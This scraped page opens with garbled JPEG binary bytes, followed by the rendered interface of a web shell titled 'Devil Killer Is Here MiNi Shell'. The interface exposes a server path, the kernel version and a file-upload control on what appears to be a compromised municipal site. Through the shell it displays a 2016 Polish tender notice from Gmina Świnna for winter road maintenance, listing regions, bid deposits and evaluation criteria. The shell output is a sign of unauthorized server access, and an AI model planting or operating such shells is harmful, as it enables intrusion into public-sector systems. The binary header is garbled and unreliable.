JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161012/322135-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http:://bip.swinna.pl' target='_blank'>http:://bip.swinna.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 322135 - 2016
              z dnia 2016-10-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Świnna: Zimowe utrzymanie dróg gminnych na terenie Gminy   Świnna w  sezonie  2016/2017.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wójt Gminy w Świnnej, krajowy numer identyfikacyjny
              55198700000, ul.
              ul. Wspólna 
              13,
              34331  
              Świnna, woj.
              śląskie, państwo
              Polska, tel.
              033 863-80-23, e-mail
              , faks
              .
              <br />
              Adres strony internetowej (URL): http://bip.swinna.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.swinna.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http:://bip.swinna.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać w formie pisemnej  za pośrednictwem  operatora pocztowego w rozmieniu ustawy z dnia 23.11.2012r. - Prawo  pocztowe (Dz.U. poz. 1529 oraz z 2015r. po. 1830), osobiście, za pośrednictwem posłańca<br />
                Adres:
                <br />Urząd Gminy w Świnnej ul. Wspólna 13   34-331 Świnna</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg gminnych na terenie Gminy   Świnna w  sezonie  2016/2017.<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>   1. Przedmiotem  zamówienia jest zimowe utrzymanie dróg gminnych na terenie  Gminy Świnna  w sezonie  zimowym 2016/2017   z podziałem na Rejony. Rejon I      sołectwo   Świnna  - drogi o długości    16 896 m
Rejon II     sołectwo   Przyłęków - drogi o długości     6 250 m
Rejon III    sołectwo   Pewel Mała  - drogi o długości    10 318 m
Rejon IV    sołectwo   Pewel Ślemieńska - drogi o długości    11 878 m
Rejon  V    sołectwo   Rychwałdek  - drogi o długości   5 814 m 
Rejon VI    sołectwo   Trzebinia - drogi o długości    10 810 m 
Opis części zamówienia: każdy Rejon należy traktować jako osobną część zamówienia:.
 2. Prace zasadnicze zimowego utrzymania dróg polegają na ręcznym i mechanicznym usuwaniu śniegu z dróg, parkingów, placów i przystanków oraz  likwidacji  śliskości powstałej w wyniku zjawisk meteorologicznych  na drogach  gminnych.
 3. Odśnieżanie dróg na całej szerokości jezdni.
 4. Likwidowanie  śliskości  na  całej  szerokości  dróg,  a  przede  wszystkim  na  odcinkach decydujących o bezpieczeństwie ruchu niebezpieczne zakręty i podjazdy, skrzyżowania,  przystanki  autobusowe  oraz  inne  miejsca  ustalone  przez   Urząd  Gminy. 
5. Zamawiający wymaga aby przedmiot zamówienia był wykonywany przy użyciu ciągnika z napędem na dwie osie wyposażonym w urządzenie do posypywania.
6. Zamawiający wymaga, aby Wykonawca odśnieżając drogi   równocześnie je posypywał jeżeli istnieje  potrzeba posypania.
7. Wszędzie  tam  gdzie  warunki  terenowe  i  pogodowe  tego wymagają, wykonawca wyposaży sprzęt używany do wykonywania usługi w łańcuchy na koła. 
8. Zamawiający nie ponosi odpowiedzialności za szkody  wyrządzone przez Wykonawcę podczas wykonywania usług. 
   9. Wymagana dyspozycyjność całodobowa, konieczność posiadania telefonu komórkowego zarówno  przez osobę  obsługującą sprzęt tj. odśnieżającą ( telefon w  kabinie ciągnika) jak  i osobę  koordynującą odśnieżanie u Wykonawcy. 
10. Materiał   do  likwidacji  śliskości  dróg  zapewnia  Zamawiający.
11. Wykaz   ulic  objętych  zimowym  utrzymaniem w  poszczególnych Rejonach  stanowi  załącznik  Nr  5 do  niniejszej  specyfikacji.
  12. Terminy   odśnieżania   dróg   uzależnione   będą   od   warunków   atmosferycznych   i przekazywania informacji przez   Kierownika   Referatu   Inwestycji jednak nie później niż  w ciągu  2  godz.  od   wezwania do  odśnieżania.  
13. Zamawiający dopuszcza możliwość składania ofert częściowych w rozumieniu art. 2 pkt 6  ustawy Prawo zamówień publicznych. Zamawiający  nie wprowadza ograniczenia o jakim stanowi art. 36aa ust. 3  ustawy Prawo zamówień publicznych, tzn.  maksymalne liczby części zamówienia, na które może zostać udzielone  zamówienie jednemu Wykonawcy. 
Wykonawca może złożyć  ofertę na jedną bądź  kilka części zamówienia.
W przypadku składania oferty  na  więcej niż jedną część  zamówienia Wykonawca musi  dysponować  odpowiednim sprzętem dla każdej części oddzielnie.  
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu sposobu dokonywania spełniania warunku  w tym zakresie. Zamawiający dokona oceny spełniają  warunku  udziału w tym zakresie na podstawie oświadczenia o spełnianiu   warunków  udziału w postępowaniu.
  <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisu sposobu dokonywania  spełniania warunku  w tym zakresie. Zamawiający dokona oceny spełniają  warunku  udziału w tym zakresie na podstawie oświadczenia o spełnianiu   warunków  udziału w postępowaniu.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O zamówienie może ubiegać się  Wykonawca, który wykaże,że posiada narzędzia i urządzenia techniczne niezbędne  w celu wykonania 
zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. 
tj.   minimum jeden   ciągnik ( z napędem  na  dwie osie )  z pługiem,   wyposażony w   urządzenie do  posypywania.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Aktualne na dzień  składania ofert oświadczenie  o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego -  zał. nr 3 do SIWZ.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz urządzeń technicznych  dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami  zał. Nr 6 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oprócz oświadczeń lub dokumentów jakie mają dostarczyć Wykonawcy w celu 
wstępnego potwierdzenia spełniania warunków udziału w postępowaniu, zobowiązani są  również dołączyć do oferty: 
a) wypełniony formularz ofertowy  zał. Nr 1 do SIWZ,
b) Dokumenty,  z których będzie wynikało, że oferta podpisana jest przez osoby uprawnione (np. aktualny odpis  z właściwego rejestru lub z centralnej ewidencji i informacji  o działalności gospodarczej, aktualny statut spółki itp.),
c) Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie będzie wynikało z  załączonego dokumentu, należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie.
d) dokument potwierdzający  wpłacenie lub   wniesienia przez Wykonawcę  wymaganego wadium.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.  Oferta  powinna   być  zabezpieczona  wadium  w  wysokości:
Rejon I      sołectwo   Świnna     500,00 zł (słownie:pięćsetzłotych)
Rejon II     sołectwo   Przyłęków  500,00 zł (słownie:pięćsetzłotych)
Rejon III    sołectwo   Pewel Mał  300,00 zł (słownie:trzystazłotych
Rejon IV    sołectwo   Pewel Ślemieńska  500,00 zł(słownie:pięćsetzłotych)
Rejon  V    sołectwo   Rychwałdek   300,00 zł (słownie:trzystazlotych)
Rejon VI    sołectwo   Trzebinia    500,00 zł( słownie:pięćsetzłotych)
najpóźniej do dnia 20  października 2015r.  do  godziny  9.30  w  następujących  formach: 
a) w  pieniądzu  płatne  przelewem  na   rachunek  bankowy  Urząd  Gminy  w  Świnnej, ul.  Wspólna  13,    34 - 331  Świnna   prowadzony   przez  ETNO  Bank   Spółdzielczy w  Radziechowach - Wieprzu  nr  konta  12  8140  0009  0000  1124  2000  0060,  do oferty należy  załączyć kopię polecenia przelewu.
b) poręczeniach   bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo  kredytowej,  z  tym  że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym, 
    c) gwarancjach  bankowych,
    d) gwarancjach ubezpieczeniowych,
    e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy   z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z  2014r. poz.  1804  oraz  z  2015r.  poz.  978  i  1240). 
2. Jeżeli wadium jest wnoszone w formie innej niż pieniądz, oryginały dokumentów, o których mowa wyżej należy złożyć w kasie Urzędu Gminy w Świnnej, natomiast do oferty  należy załączyć ich kserokopię. 
3. Przy  wnoszeniu  wadium  przelewem,  dniem  wniesienia  jest  dzień uznania na rachunku Zamawiającego kwoty wadium.
4.Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego  oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.  
5.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas reakcji od momentu wezwania do odśnieżania</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
